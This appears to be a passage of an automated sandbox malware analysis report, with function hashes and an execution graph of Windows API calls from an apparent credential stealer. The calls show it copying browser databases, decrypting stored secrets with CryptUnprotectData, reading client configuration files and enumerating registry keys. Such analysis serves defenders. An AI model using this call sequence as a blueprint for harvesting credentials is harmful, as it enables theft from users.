                                                                                                                                                      • Opcode ID: 6c0c659414bab8ecb5d511b42f03da7d0b40b85d78b2502eb82c69f9bf56e101
                                                                                                                                                      • Instruction ID: d28ab6380013ffff1b2b64f49c8a46dec2a74f4ff9c283073931c2415d3a9b88
                                                                                                                                                      • Opcode Fuzzy Hash: 6c0c659414bab8ecb5d511b42f03da7d0b40b85d78b2502eb82c69f9bf56e101
                                                                                                                                                      • Instruction Fuzzy Hash: A101D638705210DFCB61EB78E054B59BBE1EF49344F0041ACE009EF365C7719C059B90
                                                                                                                                                      Function 00770D58 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 8q
                                                                                                                                                      • API String ID: 0-4083045702
                                                                                                                                                      • Opcode ID: b12b3343e8fdd381cd73e50fb7fbbee6f30e92f7324c762d87e3c76c0ffee923
                                                                                                                                                      • Instruction ID: 5745791e404c568f53a13efbb2326f9b79e59b8e9bf578fbbeca6e93667089bc
                                                                                                                                                      • Opcode Fuzzy Hash: b12b3343e8fdd381cd73e50fb7fbbee6f30e92f7324c762d87e3c76c0ffee923
                                                                                                                                                      • Instruction Fuzzy Hash: 96F027346063508FC752EBB8F410A98BFE0AF8930070401ADE009DF3A6CB245C09DB91
                                                                                                                                                      Function 00770D68 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 8q
                                                                                                                                                      • API String ID: 0-4083045702
                                                                                                                                                      • Opcode ID: e7df0fd205004bba0c42505ea1a1cdf9bb3d9ab64dec680f47b5ddf5ac8c08e6
                                                                                                                                                      • Instruction ID: 37bcc7494e0d03ebea72d700d3c781036b9f6fe45070616fdf816560cbce8f1a
                                                                                                                                                      • Opcode Fuzzy Hash: e7df0fd205004bba0c42505ea1a1cdf9bb3d9ab64dec680f47b5ddf5ac8c08e6
                                                                                                                                                      • Instruction Fuzzy Hash: B4E09A746013248FCBA1EBA9F400B69BBD5EF88350B004468E109AF368CA30AC069BE1
                                                                                                                                                      Function 00770848 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7bf2ca6d26a5b363a62e4e8cd84bdc605f5a165a9337face2d188d039e864c15
                                                                                                                                                      • Instruction ID: 8774009be1cdf670fbe390956c3655553b2a9b4865855722e8f51bc9e31ffc45
                                                                                                                                                      • Opcode Fuzzy Hash: 7bf2ca6d26a5b363a62e4e8cd84bdc605f5a165a9337face2d188d039e864c15
                                                                                                                                                      • Instruction Fuzzy Hash: 5581CC34E00308DFDB11EBB8D8546AEB7E2EB88350F148569D409AB355DF75AD06CBD2
                                                                                                                                                      Function 0077092D Relevance: .1, Instructions: 73COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 524fe9d380a98d1496b844e72fa3ae2ba9f84d710b123055b66642353be4bbe4
                                                                                                                                                      • Instruction ID: 784b8c6e7171495de7e849d5d36d1ab3942c8eca32e7f0f784511efa316ffbe6
                                                                                                                                                      • Opcode Fuzzy Hash: 524fe9d380a98d1496b844e72fa3ae2ba9f84d710b123055b66642353be4bbe4
                                                                                                                                                      • Instruction Fuzzy Hash: AC211934E002088FDF14ABB8851876DB7E2AB84315F558469D80A9B355DF79EC428B91
                                                                                                                                                      Function 00770E18 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b8a2003535acbaeb0fff2556b1870ad570d34f4327950bf19007848263bb3d06
                                                                                                                                                      • Instruction ID: 83a5fa1f7e890f6432aca17d44dc0fea400aade611153de4f1db5975d67a7dbd
                                                                                                                                                      • Opcode Fuzzy Hash: b8a2003535acbaeb0fff2556b1870ad570d34f4327950bf19007848263bb3d06
                                                                                                                                                      • Instruction Fuzzy Hash: F3F06D39204250DFCB61EBA4E444A687FB0EB49664B1042A9E8099B322C76198019B81
                                                                                                                                                      Function 00770D28 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c54fd1e1f8a0c10d2f36ec639c2387fd079666700bcb8034ca1477806f1d1dae
                                                                                                                                                      • Instruction ID: bb745dc3523b65a87d9eaec7dea07da9f4c8832cad14c5823a0e4b6bce698aee
                                                                                                                                                      • Opcode Fuzzy Hash: c54fd1e1f8a0c10d2f36ec639c2387fd079666700bcb8034ca1477806f1d1dae
                                                                                                                                                      • Instruction Fuzzy Hash: B5D09E381452449FCB41DB74E454C593FB1EB4A2107144299E80A9B336C7719846DB41

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:48.3%
                                                                                                                                                      Signature Coverage:24.1%
                                                                                                                                                      Total number of Nodes:816
                                                                                                                                                      Total number of Limit Nodes:84
                                                                                                                                                      execution_graph 28726 a056a2 _allrem 27720 a024a4 27723 a02198 RtlZeroMemory GetVersionExW 27720->27723 27724 a021cb LoadLibraryW 27723->27724 27726 a0249b 27724->27726 27727 a021fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27724->27727 27728 a02492 FreeLibrary 27727->27728 27736 a02244 27727->27736 27728->27726 27729 a0247b 27729->27728 27730 a022e1 RtlCompareMemory 27730->27736 27731 a02365 RtlCompareMemory 27731->27736 27732 a01953 6 API calls 27732->27736 27733 a023f8 StrStrIW 27733->27736 27734 a01011 GetProcessHeap RtlFreeHeap VirtualQuery 27734->27736 27735 a017c0 9 API calls 27735->27736 27736->27728 27736->27729 27736->27730 27736->27731 27736->27732 27736->27733 27736->27734 27736->27735 27918 a02ea5 25 API calls 27919 a09ea7 RtlAllocateHeap 27920 a09ec1 27919->27920 27921 a09ed9 27919->27921 27923 a07f70 17 API calls 27920->27923 27923->27921 28622 a1b8a6 90 API calls 28623 a1b0aa 84 API calls 28624 a06eb7 24 API calls 28625 a048b1 22 API calls 27930 a02cb5 27931 a02cbe 27930->27931 27932 a01953 6 API calls 27931->27932 27933 a02cc3 27932->27933 27934 a02e17 27933->27934 27935 a01953 6 API calls 27933->27935 27936 a02cd9 27935->27936 27959 a01000 GetProcessHeap RtlAllocateHeap 27936->27959 27938 a02ce9 27960 a01000 GetProcessHeap RtlAllocateHeap 27938->27960 27940 a02cf9 27941 a01b6a 2 API calls 27940->27941 27942 a02d04 27941->27942 27943 a02ded 27942->27943 27944 a02d0c GetPrivateProfileSectionNamesW 27942->27944 27945 a01011 3 API calls 27943->27945 27944->27943 27957 a02d22 27944->27957 27946 a02e02 27945->27946 27947 a01011 3 API calls 27946->27947 27949 a02e09 27947->27949 27948 a02d3f StrStrIW 27950 a02d53 GetPrivateProfileStringW 27948->27950 27951 a02dd7 lstrlenW 27948->27951 27952 a01011 3 API calls 27949->27952 27950->27951 27954 a02d72 GetPrivateProfileIntW 27950->27954 27951->27943 27951->27957 27953 a02e10 27952->27953 27955 a01011 3 API calls 27953->27955 27954->27957 27955->27934 27956 a01953 6 API calls 27956->27957 27957->27943 27957->27948 27957->27951 27957->27956 27958 a01011 3 API calls 27957->27958 27958->27957 27959->27938 27960->27940 28626 a178b9 33 API calls 28729 a212bb _allmul _allmul _allmul _alldvrm _allmul 28627 a213ca 87 API calls 28731 a213ca 89 API calls 28732 a096bc _alldiv _alldiv _alldiv _alldiv _allmul 28734 a10284 39 API calls 28630 a4348f 27 API calls 28382 a03098 28383 a01b6a 2 API calls 28382->28383 28385 a030af 28383->28385 28384 a033a9 28385->28384 28406 a01000 GetProcessHeap RtlAllocateHeap 28385->28406 28387 a030ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28388 a54bec 89 API calls 28387->28388 28391 a03126 28388->28391 28389 a0339b DeleteFileW 28390 a01011 3 API calls 28389->28390 28390->28384 28391->28389 28392 a03392 28391->28392 28407 a202ec 94 API calls 28391->28407 28394 a53848 76 API calls 28392->28394 28394->28389 28395 a03381 28410 a1fb92 93 API calls 28395->28410 28397 a0319c RtlCompareMemory 28398 a032cd CryptUnprotectData 28397->28398 28403 a03155 28397->28403 28398->28403 28400 a031d0 RtlZeroMemory 28408 a01000 GetProcessHeap RtlAllocateHeap 28400->28408 28402 a01011 3 API calls 28402->28403 28403->28395 28403->28397 28403->28398 28403->28400 28403->28402 28404 a01fa7 19 API calls 28403->28404 28405 a01798 lstrlen 28403->28405 28409 a202ec 94 API calls 28403->28409 28404->28403 28405->28403 28406->28387 28407->28403 28408->28403 28409->28403 28410->28392 28739 a16698 30 API calls 28634 a42c9e 105 API calls 28740 a0629a 23 API calls 28743 a2069d _allmul 27924 a09ee8 27925 a09ef1 RtlFreeHeap 27924->27925 27926 a09f1a 27924->27926 27925->27926 27927 a09f02 27925->27927 27929 a07f70 17 API calls 27927->27929 27929->27926 28637 a0f4ec 20 API calls 28638 a04cf5 memset 28744 a39ef6 114 API calls 28639 a213ca 89 API calls 27997 a028f8 27998 a02900 27997->27998 27999 a02ac8 27997->27999 28032 a01000 GetProcessHeap RtlAllocateHeap 27998->28032 28029 a53848 27999->28029 28002 a0290e 28033 a202ec 94 API calls 28002->28033 28005 a01011 3 API calls 28006 a02adf 28005->28006 28008 a02a98 lstrlen 28009 a02ac1 28008->28009 28010 a02aa4 28008->28010 28012 a01011 3 API calls 28009->28012 28038 a01798 lstrlen 28010->28038 28012->27999 28013 a01fa7 19 API calls 28017 a02919 28013->28017 28014 a02ab1 28039 a01798 lstrlen 28014->28039 28016 a02ab9 28040 a01798 lstrlen 28016->28040 28017->28013 28019 a029da lstrlen 28017->28019 28023 a02a8b 28017->28023 28034 a01000 GetProcessHeap RtlAllocateHeap 28017->28034 28035 a02112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28017->28035 28036 a202ec 94 API calls 28017->28036 28019->28017 28020 a029eb lstrlen 28019->28020 28020->28017 28037 a1fb92 93 API calls 28023->28037 28025 a02a25 wsprintfA lstrlen 28026 a02a58 28025->28026 28027 a02a6a lstrcat 28025->28027 28026->28027 28028 a01011 3 API calls 28027->28028 28028->28017 28041 a537cb 28029->28041 28032->28002 28033->28017 28034->28017 28035->28025 28036->28017 28037->28008 28038->28014 28039->28016 28040->28009 28042 a537d6 28041->28042 28047 a02ad1 DeleteFileW 28041->28047 28053 a095b5 17 API calls 28042->28053 28044 a537db 28045 a537df 28044->28045 28049 a537eb 28044->28049 28054 a54da0 17 API calls 28045->28054 28047->28005 28048 a53834 28056 a53865 71 API calls 28048->28056 28049->28048 28051 a5381f 28049->28051 28055 a08795 22 API calls 28051->28055 28053->28044 28054->28047 28055->28047 28056->28047 28746 a213ca 88 API calls 28641 a05cc5 22 API calls 28750 a2faca _allmul strcspn 28642 a06eb7 22 API calls 28643 a15cca 32 API calls 28645 a534ca 57 API calls 28754 a2c6da 23 API calls 28649 a370de 24 API calls 28652 a3e024 93 API calls 28653 a27c28 8 API calls 28655 a0482b 14 API calls 28656 a2742e 24 API calls 28660 a1943d 34 API calls 28761 a0ca01 _allmul _alldiv _allmul _alldiv 28661 a39000 28 API calls 28664 a45401 memset memcpy memcpy memset memcpy 28176 a04406 28177 a02e30 22 API calls 28176->28177 28178 a04429 28177->28178 28179 a02e30 22 API calls 28178->28179 28180 a0443a 28179->28180 28276 a0a40e 28279 a0a426 28276->28279 28285 a0a4a2 28276->28285 28277 a0a469 memcpy 28277->28285 28278 a0a4cc ReadFile 28281 a0a524 28278->28281 28278->28285 28279->28277 28280 a0a44a memcpy 28279->28280 28279->28285 28288 a0a45d 28280->28288 28290 a0a2aa 17 API calls 28281->28290 28283 a0a532 28284 a0a53e memset 28283->28284 28283->28288 28284->28288 28285->28278 28285->28281 28286 a0a501 28285->28286 28289 a0a1c6 18 API calls 28286->28289 28289->28288 28290->28283 28764 a20e0c 22 API calls 28767 a2f21c 23 API calls 28668 a0581f _alldiv _allrem _allmul 28669 a42864 25 API calls 28771 a33e6b 20 API calls 28671 a1f86a 31 API calls 28672 a04c6d 17 API calls 28772 a20670 _allmul _allmul _allmul _alldvrm 28677 a5507d 24 API calls 28678 a0b079 20 API calls 28680 a1807c 23 API calls 28076 a03c40 28077 a01b6a 2 API calls 28076->28077 28078 a03c50 28077->28078 28079 a03dfa 28078->28079 28112 a01000 GetProcessHeap RtlAllocateHeap 28078->28112 28081 a03c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28113 a54bec 28081->28113 28083 a03dec DeleteFileW 28084 a01011 3 API calls 28083->28084 28084->28079 28085 a03c9a 28085->28083 28086 a03de3 28085->28086 28124 a01000 GetProcessHeap RtlAllocateHeap 28085->28124 28088 a53848 76 API calls 28086->28088 28088->28083 28089 a03cce 28125 a202ec 94 API calls 28089->28125 28091 a03cd9 28092 a03da8 28091->28092 28097 a01fa7 19 API calls 28091->28097 28101 a03d2b lstrlen 28091->28101 28126 a01000 GetProcessHeap RtlAllocateHeap 28091->28126 28127 a202ec 94 API calls 28091->28127 28128 a1fb92 93 API calls 28092->28128 28094 a03db1 lstrlen 28095 a03db9 28094->28095 28096 a03ddc 28094->28096 28129 a01798 lstrlen 28095->28129 28099 a01011 3 API calls 28096->28099 28097->28091 28099->28086 28100 a03dc8 28130 a01798 lstrlen 28100->28130 28101->28091 28103 a03d35 lstrlen 28101->28103 28103->28091 28104 a03dd2 28131 a01798 lstrlen 28104->28131 28108 a03d46 wsprintfA lstrlen 28109 a03d71 28108->28109 28110 a03d83 lstrcat 28108->28110 28109->28110 28111 a01011 3 API calls 28110->28111 28111->28091 28112->28081 28132 a5307c 28113->28132 28115 a54c01 28123 a54c44 28115->28123 28142 a1c54d memset 28115->28142 28117 a54c18 28143 a1c871 21 API calls 28117->28143 28119 a54c2a 28144 a1c518 19 API calls 28119->28144 28121 a54c33 28121->28123 28145 a5486f 89 API calls 28121->28145 28123->28085 28124->28089 28125->28091 28126->28108 28127->28091 28128->28094 28129->28100 28130->28104 28131->28096 28133 a53095 28132->28133 28141 a5308e 28132->28141 28134 a530ad 28133->28134 28159 a066ce 17 API calls 28133->28159 28136 a530ed memset 28134->28136 28134->28141 28137 a53108 28136->28137 28138 a53116 28137->28138 28160 a0c59d 17 API calls 28137->28160 28138->28141 28146 a06512 28138->28146 28141->28115 28142->28117 28143->28119 28144->28121 28145->28123 28161 a0685c 28146->28161 28148 a0651d 28148->28141 28149 a06519 28149->28148 28150 a0bfec GetSystemInfo 28149->28150 28164 a065bd 28150->28164 28152 a0c00e 28153 a065bd 16 API calls 28152->28153 28154 a0c01a 28153->28154 28155 a065bd 16 API calls 28154->28155 28156 a0c026 28155->28156 28157 a065bd 16 API calls 28156->28157 28158 a0c032 28157->28158 28158->28141 28159->28134 28160->28138 28162 a5307c 17 API calls 28161->28162 28163 a06861 28162->28163 28163->28149 28165 a5307c 17 API calls 28164->28165 28166 a065c2 28165->28166 28166->28152 28682 a04440 24 API calls 28774 a69238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28683 a26440 94 API calls 28776 a213ca 102 API calls 28685 a47452 19 API calls 28778 a05e5a 28 API calls 28435 a0105d VirtualFree 28688 a111a0 43 API calls 28780 a28ba6 7 API calls 28781 a453ad memset memcpy memset memcpy 28782 a433b7 27 API calls 28690 a29dbc 25 API calls 28783 a213ca 89 API calls 28691 a27d8b _allrem memcpy 28787 a1ab8b 19 API calls 28788 a1cb91 18 API calls 28693 a1fd97 19 API calls 28789 a213ca 88 API calls 28694 a01198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28791 a0bf9a _alldiv 28478 a01b9d 28479 a01bc1 28478->28479 28480 a01ba2 28478->28480 28480->28479 28481 a01ba9 GetFileAttributesW 28480->28481 28482 a01bb5 28481->28482 28511 a0639e 28515 a0b1e3 28511->28515 28535 a0b1e5 28511->28535 28512 a063b2 28516 a0b1e5 28515->28516 28517 a0b214 28516->28517 28571 a0aeea 28516->28571 28519 a0b233 28517->28519 28521 a0b28f 28517->28521 28589 a0ae65 28517->28589 28519->28521 28555 a0a7ae 28519->28555 28521->28512 28523 a0b2d6 28568 a06a5a 28523->28568 28529 a0b2e8 28529->28521 28531 a0b310 CreateFileMappingW 28529->28531 28530 a0b26d 28595 a0a1c6 18 API calls 28530->28595 28532 a0b32b MapViewOfFile 28531->28532 28533 a0b37e 28531->28533 28532->28529 28532->28533 28596 a0a1c6 18 API calls 28533->28596 28536 a0b214 28535->28536 28537 a0b20d 28535->28537 28539 a0b233 28536->28539 28540 a0ae65 22 API calls 28536->28540 28554 a0b28f 28536->28554 28538 a0aeea 27 API calls 28537->28538 28538->28536 28541 a0a7ae 18 API calls 28539->28541 28539->28554 28540->28539 28545 a0b267 28541->28545 28542 a0b26d 28620 a0a1c6 18 API calls 28542->28620 28543 a0b2d6 28544 a06a5a 17 API calls 28543->28544 28552 a0b2e8 28544->28552 28545->28542 28545->28543 28546 a0a67c 22 API calls 28545->28546 28545->28554 28548 a0b2be 28546->28548 28548->28542 28548->28543 28549 a0b310 CreateFileMappingW 28550 a0b32b MapViewOfFile 28549->28550 28551 a0b37e 28549->28551 28550->28551 28550->28552 28621 a0a1c6 18 API calls 28551->28621 28552->28549 28552->28554 28554->28512 28557 a0a7c7 28555->28557 28556 a0a805 28556->28521 28556->28523 28556->28530 28559 a0a67c 28556->28559 28557->28556 28597 a0a1c6 18 API calls 28557->28597 28560 a0a6c1 28559->28560 28561 a0a694 _alldiv _allmul 28559->28561 28598 a0a33b SetFilePointer 28560->28598 28561->28560 28564 a0a6f0 SetEndOfFile 28565 a0a6d4 28564->28565 28567 a0a6ee 28564->28567 28565->28567 28602 a0a1c6 18 API calls 28565->28602 28567->28523 28567->28530 28569 a5307c 17 API calls 28568->28569 28570 a06a65 28569->28570 28570->28529 28572 a06a81 memset 28571->28572 28573 a0af01 28572->28573 28574 a06a81 memset 28573->28574 28581 a0af07 28573->28581 28575 a0af2a 28574->28575 28575->28581 28604 a07f07 28575->28604 28577 a552ae _allmul 28579 a0afd9 28577->28579 28578 a0af54 28578->28577 28578->28581 28580 a0b87b 21 API calls 28579->28580 28582 a0affa 28580->28582 28581->28517 28583 a0b020 28582->28583 28584 a0b000 28582->28584 28585 a0ae65 22 API calls 28583->28585 28612 a0a1c6 18 API calls 28584->28612 28587 a0b01c 28585->28587 28587->28581 28607 a0adcc 28587->28607 28590 a0ae7a 28589->28590 28591 a0a67c 22 API calls 28590->28591 28592 a0ae83 28590->28592 28593 a0aea5 28591->28593 28592->28519 28593->28592 28619 a0a1c6 18 API calls 28593->28619 28595->28521 28596->28521 28597->28556 28599 a0a390 28598->28599 28600 a0a36a 28598->28600 28599->28564 28599->28565 28600->28599 28603 a0a1c6 18 API calls 28600->28603 28602->28567 28603->28599 28613 a07ec7 28604->28613 28609 a0ade4 28607->28609 28608 a0ae5f 28608->28581 28609->28608 28611 a0bafc 20 API calls 28609->28611 28618 a0a39e 18 API calls 28609->28618 28611->28609 28612->28587 28614 a07ed4 28613->28614 28615 a07ed9 28613->28615 28614->28578 28617 a06e6a 17 API calls 28615->28617 28617->28614 28618->28609 28619->28592 28620->28554 28621->28554 28695 a099e1 strncmp 28792 a27be1 29 API calls 28696 a0c9ea _allmul _alldiv 28698 a555eb IsProcessorFeaturePresent 28700 a049f1 13 API calls 28794 a213ca 73 API calls 28795 a19ff0 32 API calls 28701 a0d1f7 memset _allmul _allmul 28057 a047fa 28064 a0479c 28057->28064 28060 a0479c 23 API calls 28061 a04813 28060->28061 28062 a0479c 23 API calls 28061->28062 28063 a0481f 28062->28063 28065 a01afe 10 API calls 28064->28065 28066 a047af 28065->28066 28067 a047f1 28066->28067 28068 a0199d 9 API calls 28066->28068 28067->28060 28072 a047bf 28068->28072 28069 a047ea 28070 a01011 3 API calls 28069->28070 28070->28067 28071 a01d4a 18 API calls 28071->28072 28072->28069 28072->28071 28798 a373c4 22 API calls 28184 a09fc8 28185 a09fd3 28184->28185 28187 a09fd8 28184->28187 28186 a09ff4 HeapCreate 28186->28185 28188 a0a004 28186->28188 28187->28185 28187->28186 28190 a07f70 17 API calls 28188->28190 28190->28185 28801 a213ca 89 API calls 28702 a53dc8 24 API calls 28411 a043d9 28418 a04317 _alloca_probe RegOpenKeyW 28411->28418 28414 a04317 25 API calls 28415 a043f5 28414->28415 28416 a04317 25 API calls 28415->28416 28417 a04403 28416->28417 28419 a04343 RegEnumKeyExW 28418->28419 28420 a043cf 28418->28420 28421 a043c4 RegCloseKey 28419->28421 28424 a0436d 28419->28424 28420->28414 28421->28420 28422 a01953 6 API calls 28422->28424 28423 a0199d 9 API calls 28423->28424 28424->28422 28424->28423 28426 a01011 3 API calls 28424->28426 28429 a0418a 16 API calls 28424->28429 28427 a0439b RegEnumKeyExW 28426->28427 28427->28424 28428 a043c3 28427->28428 28428->28421 28429->28424 28804 a0ebd9 37 API calls 28436 a015dd 28437 a01600 28436->28437 28438 a015f3 lstrlen 28436->28438 28447 a01000 GetProcessHeap RtlAllocateHeap 28437->28447 28438->28437 28440 a01608 lstrcat 28441 a01644 28440->28441 28442 a0163d lstrcat 28440->28442 28448 a01333 28441->28448 28442->28441 28445 a01011 3 API calls 28446 a01667 28445->28446 28447->28440 28471 a01000 GetProcessHeap RtlAllocateHeap 28448->28471 28450 a01357 28472 a0106c lstrlen MultiByteToWideChar 28450->28472 28452 a01366 28473 a012a3 RtlZeroMemory 28452->28473 28455 a013b8 RtlZeroMemory 28459 a013ed 28455->28459 28456 a01011 3 API calls 28457 a015d2 28456->28457 28457->28445 28458 a015b5 28458->28456 28459->28458 28475 a01000 GetProcessHeap RtlAllocateHeap 28459->28475 28461 a014a7 wsprintfW 28463 a014c9 28461->28463 28462 a015a1 28464 a01011 3 API calls 28462->28464 28463->28462 28476 a01000 GetProcessHeap RtlAllocateHeap 28463->28476 28464->28458 28466 a01533 28467 a0159a 28466->28467 28477 a0104c VirtualAlloc 28466->28477 28468 a01011 3 API calls 28467->28468 28468->28462 28470 a0158a RtlMoveMemory 28470->28467 28471->28450 28472->28452 28474 a012c5 28473->28474 28474->28455 28474->28458 28475->28461 28476->28466 28477->28470 28483 a063dd 28486 a0b87b 28483->28486 28484 a063f4 28487 a0b88d memset 28486->28487 28490 a0b8e5 28487->28490 28489 a0b609 memset 28489->28490 28490->28487 28490->28489 28491 a0ba3c 28490->28491 28492 a0b965 CreateFileW 28490->28492 28495 a0ba14 28490->28495 28497 a0ba41 28490->28497 28501 a0b64b 18 API calls 28490->28501 28502 a0bb9f 18 API calls 28490->28502 28503 a0a2aa 17 API calls 28490->28503 28491->28484 28492->28490 28504 a0a1c6 18 API calls 28495->28504 28506 a552ae 28497->28506 28498 a0ba32 28505 a54db2 17 API calls 28498->28505 28501->28490 28502->28490 28503->28490 28504->28498 28505->28491 28507 a552bb 28506->28507 28509 a552d1 28507->28509 28510 a3ba08 _allmul 28507->28510 28509->28491 28510->28509 28705 a09925 18 API calls 28806 a4c322 27 API calls 28707 a10128 36 API calls 28808 a0cb2a _allmul _allmul 28809 a3072d 19 API calls 28710 a2f130 22 API calls 28810 a1ff32 21 API calls 28711 a19534 39 API calls 28813 a17b3d 18 API calls 28815 a10f3e 60 API calls 28167 a69304 28169 a69344 28167->28169 28168 a69584 28168->28168 28169->28168 28170 a694da LoadLibraryA 28169->28170 28174 a6951f VirtualProtect VirtualProtect 28169->28174 28171 a694f1 28170->28171 28171->28169 28173 a69503 GetProcAddress 28171->28173 28173->28171 28175 a69519 28173->28175 28174->28168 28818 a36f06 24 API calls 28181 a04108 28182 a04045 50 API calls 28181->28182 28183 a04118 28182->28183 28819 a25f08 102 API calls 28191 a1510a 28192 a15117 28191->28192 28199 a15ffa 28192->28199 28195 a15139 28197 a15164 28195->28197 28207 a0f433 28195->28207 28196 a15152 28196->28197 28213 a34f0d 28196->28213 28200 a1600a 28199->28200 28202 a16018 28200->28202 28219 a1390b 30 API calls 28200->28219 28204 a16034 28202->28204 28220 a15f7d 30 API calls 28202->28220 28206 a16047 28204->28206 28221 a10b18 58 API calls 28204->28221 28206->28195 28208 a0f445 28207->28208 28222 a123b9 28208->28222 28210 a0f47c 28212 a0f490 28210->28212 28230 a0e206 58 API calls 28210->28230 28212->28196 28214 a34f39 28213->28214 28216 a34f57 28214->28216 28271 a4549e memset 28214->28271 28218 a34f7e 28216->28218 28260 a30eb4 28216->28260 28218->28197 28219->28202 28220->28204 28221->28206 28223 a123d3 28222->28223 28226 a12473 28222->28226 28225 a12431 28223->28225 28234 a13451 43 API calls 28223->28234 28225->28226 28231 a063f7 28225->28231 28226->28210 28228 a1240f 28228->28225 28235 a1235a 17 API calls 28228->28235 28230->28212 28236 a0bafc 28231->28236 28232 a06400 28232->28226 28234->28228 28235->28225 28247 a0b609 28236->28247 28238 a0bb3f GetFileAttributesW 28239 a0bb4b 28238->28239 28245 a0bb14 28238->28245 28241 a0bb5b 28239->28241 28242 a0bb7d 28239->28242 28240 a0bb25 DeleteFileW 28240->28242 28240->28245 28250 a0a1c6 18 API calls 28241->28250 28251 a0a2aa 17 API calls 28242->28251 28245->28238 28245->28240 28245->28241 28246 a0bb1a 28245->28246 28246->28232 28252 a0a08a 28247->28252 28249 a0b60f 28249->28245 28250->28246 28251->28246 28253 a0a0a4 28252->28253 28255 a0a0aa 28253->28255 28256 a06a81 28253->28256 28255->28249 28257 a06a8f 28256->28257 28258 a06aa4 28257->28258 28259 a06a95 memset 28257->28259 28258->28255 28259->28258 28261 a30ecf 28260->28261 28264 a30e18 28260->28264 28261->28216 28262 a30e61 28273 a38cc1 memset 28262->28273 28264->28261 28264->28262 28272 a09c4f memset 28264->28272 28266 a30e6a 28274 a3f191 memset 28266->28274 28268 a30e90 28275 a2af26 memset 28268->28275 28270 a30e9a 28270->28216 28271->28214 28272->28264 28273->28266 28274->28268 28275->28270 28294 a02b15 28295 a01953 6 API calls 28294->28295 28296 a02b1f FindFirstFileW 28295->28296 28298 a02c5c 28296->28298 28317 a02b4e 28296->28317 28299 a01011 3 API calls 28298->28299 28301 a02c63 28299->28301 28300 a02b59 lstrcmpiW 28303 a02b71 lstrcmpiW 28300->28303 28304 a02c3d FindNextFileW 28300->28304 28305 a01011 3 API calls 28301->28305 28302 a01953 6 API calls 28302->28317 28303->28304 28303->28317 28306 a02c51 FindClose 28304->28306 28304->28317 28307 a02c6a 28305->28307 28306->28298 28308 a0199d 9 API calls 28310 a02bdf StrStrIW 28308->28310 28309 a019b4 lstrlenW 28309->28317 28311 a02c10 StrStrIW 28310->28311 28314 a02bf1 28310->28314 28311->28314 28312 a01cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28312->28314 28313 a01011 3 API calls 28313->28304 28314->28311 28314->28312 28314->28313 28319 a0278e 41 API calls 28314->28319 28316 a0199d 9 API calls 28316->28317 28317->28300 28317->28302 28317->28308 28317->28309 28317->28316 28318 a01011 3 API calls 28317->28318 28318->28317 28319->28311 28820 a26b14 memset memcpy _allmul 28320 a03717 28321 a01b6a 2 API calls 28320->28321 28324 a0372e 28321->28324 28322 a03c23 28324->28322 28370 a01000 GetProcessHeap RtlAllocateHeap 28324->28370 28325 a0376c GetTempPathW GetTempFileNameW 